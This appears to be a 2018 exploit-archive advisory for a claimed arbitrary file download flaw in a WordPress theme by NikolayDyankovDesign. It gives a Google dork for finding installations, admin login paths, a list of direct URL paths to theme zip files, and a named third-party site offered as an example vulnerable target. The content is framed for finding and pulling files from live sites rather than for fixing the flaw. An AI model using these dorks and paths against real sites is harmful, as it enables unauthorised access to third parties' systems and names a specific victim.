WordPress NikolayDyankovDesign theme version 2.0 suffers from an arbitrary file disclosure vulnerability.
7319655844999b939030dbbc03848d4e#################################################################################################
# Exploit Title : WordPress NikolayDyankovDesign Themes 2.0 Arbitrary File
Download
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 08/12/2018
# Vendor Homepage : pinterest.com/nikolaydyankov/ ~ nikolaydyankovdesign.com
~ semsoft.ca
# Software Download Link : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0 and 2.0
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/themes/nikolaydyankovdesign/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
#################################################################################################
# Admin Panel Login Path :
/demox/admin/
/wp-log
# Exploit :
/wp-content/themes/nikolaydyankovdesign/documentations/dynamic-grid-the-engine.zip
/wp-content/themes/nikolaydyankovdesign/documentations/flipper-for-wordpress-2-0.zip
/wp-content/themes/nikolaydyankovdesign/documentations/flipper.zip
/wp-content/themes/nikolaydyankovdesign/documentations/rockstar-map-for-wordpress.zip
/wp-content/themes/nikolaydyankovdesign/documentations/rockstar-map.zip
/wp-content/themes/nikolaydyankovdesign/documentations/timeliner-for-wordpress.zip
/wp-content/themes/nikolaydyankovdesign/documentations/timelinexml.zip
/wp-content/themes/nikolaydyankovdesign/documentations/touch-timeline-for-wordpress.zip
/wp-content/themes/nikolaydyankovdesign/documentations/touch-timeline.zip
#################################################################################################
# Example Vulnerable Site =>
[+]
photobook.com.tr/demox/siparis/wp-content/themes/nikolaydyankovdesign/documentations/dynamic-grid-the-engine.zip
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################